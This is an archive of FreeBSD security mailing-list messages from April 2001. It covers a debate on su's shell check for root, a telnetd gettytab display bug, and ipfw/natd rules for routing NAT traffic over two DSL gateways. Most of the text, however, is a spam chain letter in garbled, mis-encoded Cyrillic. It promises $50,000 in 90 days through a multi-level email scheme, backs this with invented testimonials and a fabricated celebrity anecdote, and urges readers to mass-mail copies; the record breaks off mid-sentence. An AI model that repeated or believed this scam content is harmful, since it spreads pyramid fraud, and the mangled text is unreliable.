26920 invoked from network); 3 Apr 2001 22:40:16 -0000 Received: from unknown (HELO server2) (216.120.87.3) by 216.120.87.2 with SMTP; 3 Apr 2001 22:40:16 -0000 Message-ID: <004201c0bc8f$09c514f0$035778d8@sherline.net> From: "Jeremiah Gowdy" To: "Matthew Emmerton" , "Kherry Zamore" , Cc: References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <002d01c0bc6d$2d558390$035778d8@sherline.net> <009001c0bc8e$a1eb6370$1200a8c0@gsicomp.on.ca> Subject: Re: su change? Date: Tue, 3 Apr 2001 15:40:09 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Matthew Emmerton" To: "Jeremiah Gowdy" ; "Kherry Zamore" ; Cc: Sent: Tuesday, April 03, 2001 3:37 PM Subject: Re: su change? > > > > if (!chshell(pwd->pw_shell) && ruid) > > > > errx(1, "permission denied (shell)."); > > > > > > > > The only thing we need to prepend to this is a check to see if we are > > > trying > > > > to su to root, which we should allow regardless of the shell > specified: > > > > > > I disagree. The root account is an account that needs to have the > highest > > > number of security checks present. > > > > Then make a point as to why root, when not having a valid shell, not being > > able to log in is a useful security check in any way shape or form. So > > people can change root's shell to something invalid when they want to lock > > the root account ? That's nonsensical. > > Last time I checked, only root had write access to /etc/master.passwd and > /etc/shells, so only someone who hacked root could change root's shell to > something invalid. (Note that I'm not handling the case of where an > administrator does something stupid.) > > gabby# ls -al /etc/shells /etc/master.passwd > -rw-r--r- 1 root wheel 223 Jul 28 2000 /etc/shells > -rw------ 1 root wheel 1423 mar 18 14:10 /etc/master.passwd > gabby# > > If someone happens to change root's shell, then the security of the machine > has been breached in some way. The immediate consequence is that root can't > log in. If you (the administrator) notices that you can't log in as root > anymore, then it's a really big clue that something major is wrong, and > would neccessitate taking the machine out of multi-user mode ASAP to perform > the investigation and fix things up. If someone roots your box, they're not going to change your shell to something invalid. If they have root, why change the shell at all. When you root a box, do you say "Damnit, why is this guy using csh ! I want bash !". It still doesn't make sense. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 16: 2:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 21F9E37B71E for ; Tue, 3 Apr 2001 16:02:38 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f33N2WY14827; Tue, 3 Apr 2001 16:02:32 -0700 (PDT) Date: Tue, 3 Apr 2001 16:02:32 -0700 From: Alfred Perlstein To: Roman Shterenzon Cc: security@freebsd.org Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected Message-ID: <20010403160232.I12164@fw.wintelcom.net> References: <20010403151111.E12164@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Wed, Apr 04, 2001 at 12:39:54AM +0200 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Roman Shterenzon [010403 15:35] wrote: > With enough attention and code analysis, that could be made before > 4.3-RELEASE. There's almost two weeks left, and many people who are > willing to test it. Me for example :) There's basically two telnetd's in the source tree. When you compile and install the one from src/secure/libexec/telnetd you get one that doesn't respect the if= directive. It looks like it doesn't even respect the other settings, something to do with the USER environment variable. I've moved this to the security list in an effort to get this explained. Anyone know why this going on? Basically in "normal" (src/libexec/telnetd.c) this: if (getenv("USER")) hostinfo = 0; is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c) it's true and therefore doesn't display the login info. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 0:25:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id E691637B724 for ; Wed, 4 Apr 2001 00:25:43 -0700 (PDT) (envelope-from cjclark@alum.mit.edu) Received: from alum.mit.edu ([207.88.154.6]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GB9BAB00.223; Wed, 4 Apr 2001 00:25:23 -0700 Message-ID: <3ACAE8CE.F9223E28@alum.mit.edu> Date: Wed, 04 Apr 2001 02:26:38 -0700 From: "Crist J. Clark" X-Mailer: Mozilla 4.72 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Matthew Reimer Cc: owensmk@earthlink.net, security@FreeBSD.ORG Subject: Re: Multiple Default Gateways using DIVERT References: <3ACA3077.BA9CFFCE@vpop.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Reimer wrote: > > Michael Owens wrote: > > > > My company has a single DSL line through which I have set up internet access > > via NAT using IPF. > > > > We are getting a second DSL line, and I was wondering what the best way, if > > any, would be to use NAT and different default gateways so as to divide up > > the groups by source address across them. I would like 10.10.10.1-128 to go > > through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say > > 2.2.2.2). I have searched the mail archives and seen various suggestions, but > > none seemed to address this specifically. > > > > I know this can't be done with IPF, Hmm... > > so I am asking if this is something that > > could be done with IPFW. From what I can tell, it might using divert, but I > > am not all that clear on divert's use in varying gateways. > > This might be a start, though I'm not sure how NAT should fit in. You'll > need the IPFIREWALL and IPFIREWALL_FORWARD kernel options. > > ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any > ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any Neither of the two responses I saw looked like they would do what the original poster wanted. It is a start, but this one will not work as shown with natd. The search will terminate with the above rules, before being divert(4)ed. The trick is going to be doing NAT on a packet, but still having some way to tell from which half of the 10.10.10.0/24 block it originated. What I think the best thing to do is run two natd(8) processses. If you have two DSL links, I assume you have at least two public IP addresses to play with. I will call them, oip1 and oip2. Start two natd(8)s, one of the public IPs each, # natd -a ${oip1} -p 8668 # natd -a ${oip2} -p 8669 Then, for your ipfw(8) rules, ipfw add 500 divert 8668 ip from 10.10.10.0/25 to any out via ${oif} ipfw add 600 divert 8669 ip from 10.10.10.128/25 to any out via ${oif} ipfw add 700 divert 8668 ip from any to ${oip1} in via ${oif} ipfw add 800 divert 8669 ip from any t0 ${oip2} in via ${oif} ipfw add 1000 fwd 2.2.2.1 ip from ${oip1} to any out via ${oif} ipfw add 2000 fwd 2.2.2.2 ip from ${oip2} to any out via ${oif} At least... I think that should do it. Looks good on the screen. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 0:51:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13205.mail.yahoo.com (web13205.mail.yahoo.com [216.136.174.190]) by hub.freebsd.org (Postfix) with SMTP id 28D8337B71F for ; Wed, 4 Apr 2001 00:47:34 -0700 (PDT) (envelope-from wm_13@yahoo.com) Message-ID: <20010404074734.10927.qmail@web13205.mail.yahoo.com> Received: from [212.17.24.17] by web13205.mail.yahoo.com; Wed, 04 Apr 2001 00:47:34 PDT Date: Wed, 4 Apr 2001 00:47:34 -0700 (PDT) From: Mike Subject: Ïðåäëàãàþ ðàáîòó â èíòåðíåòå (50000$ çà 3 ìåñÿöà) To: wm_13@yahoo.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-2086206725-986370454=:7069" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --0-2086206725-986370454=:7069 Content-Type: text/plain; charset=us-ascii var yviContents='http://us.toto.geo.yahoo.com/toto?s=76001065&l=NE&b=1&t=986291654';yviR='us';yfiEA(0);ÍÅ ÓÄÀËßÉÒÅ ÝÒÎ, ÎÒÏÅ×ÀÒÀÉÒÅ ÝÒÎ, ÏÐÎ×ÈÒÀÉÒÅ ÝÒÎ ÎÒÏÅ×ÀÒÀÉÒÅ ÝÒÎ, ÏÎÆÀËÓÉÑÒÀ, È ÑÏÎÊÎÉÍÎ ÏÐÎ×ÈÒÀÉÒÅ ! ÂÛ ÇÀÐÀÁÎÒÀÅÒÅ ÌÍÎÃÎ ÄÅÍÅÃ! ÝÒÎÒ ÁÈÇÍÅÑ ÐÀÁÎÒÀÅÒ ÏÐÎÑÒÎ ÂÅËÈÊÎËÅÏÍÎ!!! ß ÐÀÁÎÒÀÞ ÏÎ ÝÒÎÉ ÏÐÎÃÐÀÌÌÅ ÎÄÈÍ - ÄÂÀ ×ÀÑÀ  ÄÅÍÜ, ÂÊËÞ×Àß ÎÁÐÀÁÎÒÊÓ ÇÀÊÀÇÎÂ È ÄÎÐÎÃÓ Â ÁÀÍÊ!!! Íà÷íèòå ðàáîòàòü ñ íàìè è óâèäèòå, ÷òî áóäåòå ðàäû òîìó, ÷òî òàê ñäåëàëè!!! ÇÀÐÀÁÎÒÀÉÒÅ 100.000,- USD ÇÀ ÃÎÄ ÍÀ ÐÅÊËÀÌÅ Â ÈÍÒÅÐÍÅÒÅ È ÐÀÑÑÛËÊÅ E-MAIL!!! Óâàæàåìûå äðóçüÿ è ïîäðóãè, Âû ìîæåòå çàðàáîòàòü 50.000,- USD è áîëüøå â òå÷åíèå ñëåäóþùèõ 90 äíåé íà ðàññûëêå e-mail. ÊÀÆÅÒÑß ÍÅÂÎÇÌÎÆÍÛÌ?? Ïðî÷èòàéòå äåòàëè, â ýòîì íåò íèêàêîé êàâåðçû èëè îáìàíà, ïðîñòî äåëàéòå ñåáå ðåêëàìó â Èíòåðíåò, ðàññûëàéòå e-mail è ðàçìåùàéòå ðåêëàìíûå îáúÿâëåíèÿ, è ÂÛ âñòàíåòå íà ïóòü ê ôèíàíñîâîé íåçàâèñèìîñòè è ÑÂÎÁÎÄÅ!! "AS SEEN ON NATIONAL TELEVISION" Ñïàñèáî çà Âàøå âðåìÿ è èíòåðåñ. Îá ýòîì ïèñüìå íåäàâíî áûëî íàïèñàíî â àìåðèêàíñêèõ ãàçåòàõ. Òàêæå, ââèäó åãî ïîïóëÿðíîñòè â Èíòåðíåòå, ãëàâíàÿ íî÷íàÿ èíôîðìàöèîííàÿ ïðîãðàììà ïîñâåòèëà åìó öåëóþ ïåðåäà÷ó íà îáúÿñíåíèå è âûÿñíåíèå, äåéñòâèòåëüíî ëè íèæå îïèñàííàÿ ïðîãðàììà ìîæåò ïðèíåñòè ëþäÿì äåíüãè. Òàêæå ïðîâåäåíî èññëåäîâàíèå ëåãàëüíîñòè äàííîé ïðîãðàììû.  ðåçóëüòàòå êîòîðîãî, ðàç è íàâñåãäà ïîäòâåðäèëîñü, ÷òî íå íàðóøàþòñÿ íèêàêèå çàêîíû è ïîñòàíîâëåíèÿ. Ýòî ïîìîãëî ïîêàçàòü ëþäÿì, ÷òî ýòî ïðîñòîé, áåçâðåäíûé è èíòåðåñíûé ñïîñîá çàðàáîòêà äåíåã íà äîìó. Âû ïîéìåòå ñóòü, êàê òîëüêî ïðî÷èòàåòå ýòî ðóêîâîäñòâî.     Íàïå÷àòàéòå ýòîò äîêóìåíò ñåé÷àñ, äëÿ ïîñëåäóþùåãî ÷òåíèÿ. (Èíôîðìàöèÿ òðåáóåò âíèìàòåëüíîãî ïðî÷òåíèÿ) Ñëåäóþùàÿ âîçìîæíîñòü, ïðèíîñèò äîõîä , è ìîæåò Âàñ çàèíòåðåñîâàòü. Åñòü âîçìîæíîñòü åå íà÷àòü ñ ìèíèìàëüíûìè èíâåñòèöèÿìè, à äîõîä ïðîñòî ÏÎÐÀÇÈÒÅËÜÍÛÉ!!!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Õîòèòå çàðàáîòàòü 50.000,- USD ìåíüøå ÷åì çà 90 äíåé!? Ïîæàëóéñòà, ïðî÷èòàéòå äàííóþ ïðîãðàììó, ñíà÷àëà ÿ ýòîìó òîæå íå âåðèë, îäíàêî ýòî òàê!!! À ïîòîì ïðî÷èòàéòå ýòî ÅÙÅ ÐÀÇ! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ÝÒÎ ËÅÃÀËÜÍÀß ÂÎÇÌÎÆÍÎÑÒÜ ÇÀÐÀÁÎÒÀÒÜ ÄÅÍÜÃÈ !!! !!! Ýòî íå òðåáóåò, ÷òîáû âû âñòðå÷àëèñü ñ ëþäüìè (êàê âî ìíîãèõ äðóãèõ ïîäîáíûõ ïðåäëîæåíèÿõ)!!! Ìîæåòå ðàáîòàòü ñâîèì òåìïîì. Ñàìîå ëó÷øåå ýòî òî, ÷òî íåò íåîáõîäèìîñòè ïîêèäàòü ñâîé äîì. Åñëè âû âåðèòå, ÷òî êîãäà-íèáóäü, â îäèí ïðåêðàñíûé äåíü, ó Âàñ ïîÿâèòüñÿ âîçìîæíîñòü äîëãî îòäûõàòü, òàê ýòo, èìåííî, è åñòü òàêàÿ ÂÎÇÌÎÆÍÎÑÒÜ!!!!! Ïðîñòî, ñëåäóéòå äàííîé èíñòðóêöèè, è Âàø ñîí èñïîëíèòñÿ. Ýòîò áèçíåñ - Multi-level-E-MAIL òîðãîâëÿ ïî çàêàçàì, ïðîãðàììà äåéñòâóåò ïðåâîñõîäíî íà 100% è êîãäà è ãäå óãîäíî. E-mail ÿâëÿåòñÿ òîðãîâûì èíñòðóìåíòîì áóäóùåãî!!! Èñïîëüçóéòå ýòîò íåêîììåð÷åñêèé ìåòîä ðåêëàìû. Ñäåëàéòå ýòî ñåé÷àñ!!! ×åì äîëüøå áóäåòå æäàòü, òåì áîëüøå ëþäåé áóäåò äåëàòü ýòîò áèçíåññ. Âîçüìèòå ñåáå ÷àñòü ÝÒÎÉ ÀÊÖÈÈ!! MULTI-LEVEL-MARKETING (MLM) íàêîíåö-òî äîñòèã óâàæåíèÿ. Îí ïðåïîäàåòñÿ â Ãàðâàðäñêîé òîðãîâîé øêîëå. Ñòýíôîðäñêèé èññëåäîâàòåëüñêèé èíñòèòóò è æóðíàë Wall Street çàÿâèëè, ÷òî 50-65% âñåõ òîâàðîâ è óñëóã äî êîíöà òûñÿ÷åëåòèÿ áóäóò ïðîäàâàòüñÿ ïîñðåäñòâîì multi-level ìåòîäîâ. Ýòî ìíîãî ìèëëèàðäíàÿ äîëëàðîâàÿ èíäóñòðèÿ, è òîëüêî èç 500,000 ìèëëèîíåðîâ â ÑØÀ, öåëûõ 20% (100.000 ÷åëîâåê) ñäåëàëè ñâîå ñîñòîÿíèå çà ïîñëåäíèå ïàðó ëåò áëàãîäàðÿ MLM. À åùå, ñòàòèñòèêà ïîêàçûâàåò, ÷òî 45 ÷åëîâåê êàæäûé äåíü ñòàíîâÿòñÿ ìèëëèîíåðàìè áëàãîäàðÿ Multi-Level-Marketing. Âîçìîæíî, ÷òî âû óæå ñëûøàëè èñòîðèþ, êàê Äîíàëüä Òðàìï ëåòîì íàâåñòèë øîó Äåâèäà Ëåòòåðìàíà. Äåâèä ñïðîñèë åãî, ÷òîáû îí äåëàë åñëè áû ïîòåðÿë âñå ñâîå ñîñòîÿíèå è âûíóæäåí áûë íà÷àòü âñå ñ íà÷àëà. Äîíàëüä áåç êîëåáàíèÿ îòâåòèë, ÷òî íàøåë áû õîðîøóþ MLM ôèðìó è íà÷àë ðàáîòàòü. Ïóáëèêà íà÷àëà ñâèñòåòü âûðàæàÿ íåñîãëàñèå. Äîíàëüä ïîñìîòðåë íà çðèòåëüíûé çàë è ñåðüåçíî ïðîèçíåñ: "Áëàãîäàðÿ ýòîìó ÿ çäåñü íàâåðõó, à âû òàì, âíèçó!" Ñ ñåòåâûì ìàðêåòèíãîì âû èìååòå äâà èñòî÷íèêà ïðèáûëè: Ïðÿìàÿ ïðèáûëü ñ ïðîäàæè, êîòîðóþ ïðîâîäèòå Âû ñàìè è ïðèáûëü ñ îáîðîòà ëþäåé, êîòîðûõ ïðèâåäåòå â áèçíåñ. Áåñêîíå÷íàÿ ïðèáûëü ÿâëÿåòñÿ òàéíîé áîãàòñòâà. Ýòî çíà÷èò îäèí ðàç èíâåñòèðîâàòü âðåìÿ èëè äåíüãè à ïîòîì ïîëó÷àòü äåíüãè ñíîâà è ñíîâà.  ñåòåâîì ìàðêåòèíãå ýòî òàêæå îçíà÷àåò ïîëó÷àòü äåíüãè çà ðàáîòó äðóãèõ. Ê ñîæàëåíèþ, ïðî÷èòàâ ýòî ïèñüìî âïåðâûå, ÿ ïðàêòè÷åñêè ïðîïóñòèë òàêóþ âîçìîæíîñòü ñêâîçü ïàëüöû, è äàæå íå ñòàë ÷èòàòü äàëüøå, íî âñêîðå ÿ ïåðå÷èòàë âñå çàíîâî. Çàäóìàëñÿ è ïîíÿë âñþ ñèëó ýòîãî ïðåäëîæåíèÿ. È òåïåðü ÿ áîãàò è ñâîáîäåí. ß ìîãó äóõîâíî ðàçâèâàòüñÿ, îòäûõàòü, íàäî ìíîé íåò ãíåòà íà÷àëüñòâà, ìîåé ñåìüå è ìíå íå ìåøàåò óíèçèòåëüíàÿ áåäíîñòü è áîðüáà çà êóñîê õëåáà, ìåøàÿ ÷åëîâå÷åñêîé æèçíè... ************************************************************ Íàïðèìåð, âîò ÷òî ãîâîðèò ìèñòåð Äæåðè Ïðîêòîð, àìåðèêàíñêèé ìèëëèîíåð. Äâà ãîäà íàçàä áûëà óïðàçäíåíà ìîÿ äîëæíîñòü â ôèðìå, â êîòîðîé ÿ ðàáîòàë ïîñëåäíèõ ïÿòíàäöàòü ëåò. Ïîñëå íåñêîëüêèõ íåóñïåøíûõ ñîáåñåäîâàíèé ÿ ðåøèë íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ.  òå÷åíèè ïðîøëûõ ëåò ÿ ïðîøåë ìíîãî ôèíàíñîâûõ çàòðóäíåíèé. ß áûë äîëæåí ñâîåé ñåìüå, äðóçüÿì è êðåäèòîðàì áîëåå 35.000,- USD. ß áûë âûíóæäåí çàëîæèòü ñâîé äîì, ÷òîáû ïðîêîðìèòü ñâîþ ñåìüþ è óäåðæàòü ñâîé áèçíåñ.  ÝÒÎÒ ÌÎÌÅÍÒ ïðîèçîøëî íå÷òî âûäàþùååñÿ â ìîåé æèçíè, è ÿ ïèøó äëÿ òîãî, ÷òîáû ïîäåëèòüñÿ îá ýòîì çíàìåíàòåëüíîì ñîáûòèè ñ Âàìè.  ñåðåäèíå äåêàáðÿ 1998 ÿ ïîëó÷èë e-mail ñ ýòîé ïðîãðàììîé. Ïåðåä ýòèì ÿ øåñòü ìåñÿöåâ èñêàë ðàçíûå òîðãîâûå âîçìîæíîñòè. Âñå ïðîãðàììû, êîòîðûå ÿ ïîëó÷èë íå áûëè ýôôåêòèâíûìè (ïî êðàéíåé ìåðå íà ìîé âçãëÿä). Îíè áûëè èëè ñëèøêîì ñëîæíûìè èëè òðåáîâàëè áîëüøèõ èíâåñòèöèé, à ðèñêîâàòü ñâîèì âêëàäîì, ÷òîáû óçíàòü äåéñòâóåò ýòî èëè íåò, ÿ íå õîòåë. Êàê ÿ óæå ãîâîðèë, â äåêàáðå 1998 ÿ ïîëó÷èë ýòó ïðîãðàììó. ß íå õîòåë åå ïîëó÷àòü, ïðîñòî, ïîëó÷èë òàê æå êàê è Âû. Ñïàñèáî Áîãó çà ýòî! ß ïðî÷èòàë ïðîãðàììó íåñêîëüêî ðàç, ïîòîìó ÷òî íå ìîã â íåå ïîâåðèòü, è ïðèíÿëñÿ çà ðàáîòó. ß ìîã èíâåñòèðîâàòü òîëüêî ñòîëüêî äåíåã, ñêîëüêî â äàííûé ìîìåíò áûëî âîçìîæíî. Òàê æå êàê è Âû ÿ áûë ñêåïòè÷åí è íåìíîãî áîÿëñÿ î ëåãàëüíîñòè äàííîé ïðîãðàììû. Ïîñëå èñêëþ÷åíèÿ òîãî, ÷òî ïðîãðàììà ìîæåò áûòü íåëåãàëüíîé, ÿ ñêàçàë ñåáå, ïî÷åìó áû ìíå ýòî íå ïîïðîáîâàòü. Ïîòîì ÿ ïîñëàë îêîëî 10.000 e-mail. Ñòîèëî ìíå ýòî îêîëî 15,- USD çà ìîå âðåìÿ on-line. Ïðåâîñõîäíîå ñâîéñòâî e-mail ñîñòîèò â òîì, ÷òî íå íàäî íè÷åãî ïå÷àòàòü, à íóæíî òîëüêî ïîñûëàòü. Òàê êàê âñå çàêàçû îôîðìëÿþòñÿ ÷åðåç e-mail, òî ìîåé èíâåñòèöèåé áûëî òîëüêî ìîå âðåìÿ, êîòîðîå ÿ ïðîâåë ó êîìïüþòåðà. Ãîâîðþ Âàì êàê ýòî áûëî, íàäåþñü, ÷òî Âàñ ýòî íå ðàçî÷àðóåò, òàê êàê ÿ ïîîáåùàë ñåáå, ÷òî íèêîãî íå îáìàíó, ÷åãî áû ìíå ýòî íå ñòîèëî. Ìåíüøå ÷åì ÷åðåç íåäåëþ ÿ íà÷àë ïîëó÷àòü çàêàçû íà REPORT #1. Äî 13 ÿíâàðÿ 1999 ÿ ïîëó÷èë 26 çàêàçîâ íà REPORT #1. Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 20 çàêàçîâ íà REPORT #1  ÒÅ×ÅÍÈÈ ÄÂÓÕ ÍÅÄÅËÜ. ÅÑËÈ ÂÛ ÈÕ ÍÅ ÏÎËÓ×ÈÒÅ, ÏÎØËÅÒÅ ÁÎËÜØÅ ÄÀÍÍÛÕ ÏÐÎÃÐÀÌÌ, ÄËß ÒÎÃÎ ×ÒÎÁÛ ÈÕ ÏÎËÓ×ÈÒÜ! Ìîé øàã ê ïîëó÷åíèþ 50.000,- USD çà 90 äíåé áûë ñäåëàí. Äî 30 ÿíâàðÿ 1999 ÿ ïîëó÷èë 196 çàêàçîâ íà REPORT #2. Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 100 çàêàçîâ íà REPORT #2 â òå÷åíèè äâóõ íåäåëü. Åñëè ýòî íå ïîëó÷èòñÿ, òàê ðàññûëàéòå áîëüøå ýòèõ ïðîãðàìì. Êàê òîëüêî äîñòèãíèòå 100 çàêàçîâ íà REPORT #2 òî âñå îñòàëüíîå áóäåò â ïîðÿäêå è Âû òî÷íî ïîëó÷èòå ñâîè 50.000,- USD. Ó ìåíÿ áûëî 196 çàêàçîâ íà REPORT #2, òî åñòü íà 96 áîëüøå ÷åì ìíå áûëî íóæíî. Ïîýòîìó ÿ ñåë è îòäûõàë. Äî 1 ìàðòà 1999 çà ñâîè 10.000 îòîñëàíûõ e-mail ÿ ïîëó÷èë 58.000,- USD è êàæäûé äåíü ïðèõîäèëè íîâûå äåíüãè. ß çàïëàòèë ñâîè äîëãè è êóïèë ñåáå ìàøèíó. Ïîæàëóéñòà, íàéäèòå âðåìÿ è âíèìàòåëüíî ïðî÷èòàéòå ýòó ïðîãðàììó. ÝÒÎ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!!! Ïîìíèòå, ÷òî ýòî íå çàðàáîòàåò, ïîêà âû ýòî íå ïîïðîáóåòå! Ýòà ïðîãðàììà äåéñòâóåò, íî Âû äîëæíû òî÷íî ïðèäåðæèâàòüñÿ ðåêîìåíäàöèé!! Ñïåöèàëüíîå ïðàâèëî - íå ñòàðàéòåñü âïèñûâàòü Âàøå èìÿ òàì, ãäå ýòî íå íóæíî. Ýòî íå áóäåò äåéñòâîâàòü, à Âû íåäîïîëó÷èòå ìíîãî äåíåã!! Áîëåå òîãî, ïðè èçìåíåíèè äàííûõ ïðîäàâöîâ èíà÷å, ÷åì ýòî óêàçàíî â èíñòðóêöèè íèæå, äàííûé âèä ïðåäïðèíèìàòåëüñòâà ñòàíîâèòñÿ íåëåãàëüíûì. Ñíîâà ïîâòîðÿþ, ÷òî â ñëó÷àå ñîáëþäåíèÿ âñåõ íèæåóêàçàííûõ ðåêîìåíäàöèé, ðå÷ü èäåò î ëåãàëüíîì ïðåäïðèíèìàòåëüñòâå!! Äëÿ òîãî, ÷òîáû âû äîñòèãëè ñâîåé öåëè íåîáõîäèìî ïîëó÷èòü 20 è áîëüøå çàêàçîâ íà REPORT #1 è 100 è áîëüøå íà REPORT #2.  ýòîì ñëó÷àå çàðàáîòàåòå 50.000,- USD (èëè áîëüøå) çà 90 äíåé! ß - ÐÅÀËÜÍÎÅ ÄÎÊÀÇÀÒÅËÜÑÒÂÎ ÒÎÃÎ, ×ÒÎ ÝÒÎ ÍÀ ÑÀÌÎÌ ÄÅËÅ ÄÅÉÑÒÂÓÅÒ!!! Åñëè âû ðåøèëèñü, ÷òî â ýòîé ïðîãðàììå ó÷àñòâîâàòü íå áóäåòå, òàê ìíå âàñ èñêðåííå æàëü. Òàê êàê ýòî ðåàëüíàÿ ïðåâîñõîäíàÿ âîçìîæíîñòü ñ ìèíèìàëüíûì ðèñêîì è èíâåñòèöèÿìè! Åñëè õîòèòå ó÷àñòâîâàòü, ïðèäåðæèâàéòåñü äàííûõ ðåêîìåíäàöèé è áóäåòå íà äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè. Åñëè çàíèìàåòåñü ïðåäïðèíèìàòåëüñòâîì èëè õîòèòå íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ, òàê ñ÷èòàéòå ýòî çà õîðîøóþ âîçìîæíîñòü. ß ÝÒÎ ÑÄÅËÀË !!! Ñ óâàæåíèåì Äæåðè Ïðîêòîð.       ÝÒÎ ÏÎÐÀÇÈÒÅËÜÍÎ!!! (ËÈ×ÍÀß ÇÀÌÅÒÊÀ ÎÒ ÎÑÍÎÂÀÒÅËß ÝÒÎÉ ÏÐÎÃÐÀÌÌÛ) ************************************************************ Ïåðåä òåì êàê ïðî÷èòàåòå ýòó ïðîãðàììó, âû äîëæíû ïîíÿòü, ÷òî ýòà ëåãàëüíàÿ ïðîãðàììà íå ìîãëà áûëà áûòü ñîçäàíà ëþáèòåëåì. Ïîçâîëüòå ìíå íåìíîãî ðàññêàçàòü î ñåáå. Öåëûõ 10 ëåò ó ìåíÿ áûë ñîáñòâåííûé ðàçâèâàþùèéñÿ áèçíåñ.  1979 ãîäó ìîé áèçíåñ íà÷àë ðóøèòüñÿ. ß äåëàë âñå, ÷òî ìíå äî ýòîãî ïðèíîñèëî óñïåõ, íî áåçóñïåøíî. Íàêîíåö ÿ ïîíÿë, ÷òî ýòî íå èç-çà ìåíÿ, à èç-çà ýêîíîìèêè, êîòîðàÿ íàñ ñîïðîâîæäàëà ñ 1945 ãîäà. Äóìàþ íå íóæíî Âàì îáúÿñíÿòü, êàê ýòî ïîâëèÿëî íà áåçðàáîòèöó â ñòðàíå, ìíîãèå èç Âàñ ýòî çíàþò ïî ñîáñòâåííîìó îïûòó. Ïðèøëî ìíîãî ïàäåíèé è áàíêðîòîâ. Ñðåäíèé êëàññ èñ÷åçàë, òå, êîòîðûå çíàëè ÷òî äåëàþò, ìóäðî èíâåñòèðîâàëè è ïðîäâèíóëèñü âûøå, à òå êòî íå çíàë, ïàäàëè âñå íèæå, â áåäíîòó. Êàê ãîâîðèò èçâåñòíàÿ ïîãîâîðêà: "ÁÎÃÀÒÛÅ ÁÎÃÀÒÅÞÒ, À ÁÅÄÍÛÅ ÁÅÄÍÅÞÒ". Òðàäèöèîííûå ñïîñîáû çàðàáîòêà äåíåã íèêîãäà íå ïîçâîëÿò Âàì âûñîêî ïîäíÿòüñÿ, à èíôëÿöèÿ òîëüêî ýòîìó ïîìîæåò. Ñåé÷àñ âû ïîëó÷èëè ïèñüìî, êîòîðîå ìîæåò äàòü Âàì ôèíàíñîâóþ íåçàâèñèìîñòü íà âñþ Âàøó æèçíü è "ÁÅÇ ÐÈÑÊÀ" è ñ "ÌÈÍÈÌÀËÜÍÛÌÈ ÓÑÈËÈßÌÈ".  ïîñëåäóþùèõ ìåñÿöàõ Âû ñìîæåòå çàðàáîòàòü äåíåã áîëüøå, ÷åì ìîæåòå ñåáå ïðåäñòàâèòü. Íóæíî ïîä÷åðêíóòü, ÷òî ÿ ñ ýòèõ äåíåã íå óâèæó íè öåíòà. Êàê è íèêòî èç ëþäåé, êîòîðûå òåñòèðîâàëè äàííóþ ïðîãðàììó. ß óæå çàðàáîòàë áîëåå 4.000.000,- USD!!! Ïåðåñòàë èñïîëüçîâàòü ýòó ïðîãðàììó ïîñëå òîãî, êàê ïîñëàë 16.000 ïðîãðàìì. Ñåé÷àñ ó ìåíÿ íåñêîëüêî ôèðì, êîòîðûå èçîáðåòàþò ïîäîáíûå ïðîãðàììû. Âûïîëíÿéòå ïðîãðàììó ÒÎ×ÍÎ ÏÎ ÈÍÑÒÐÓÊÖÈÈ!! Íå èçìåíÿéòå åå íèêàêèì îáðàçîì!! Îíà äåéñòâóåò ìàêñèìàëüíî ýôôåêòèâíî èìåííî â ýòîì âèäå. Íå çàáóäüòå ïîñëàòü êîïèþ ýòîé ïðîãðàììû êàæäîìó, êîãî òîëüêî 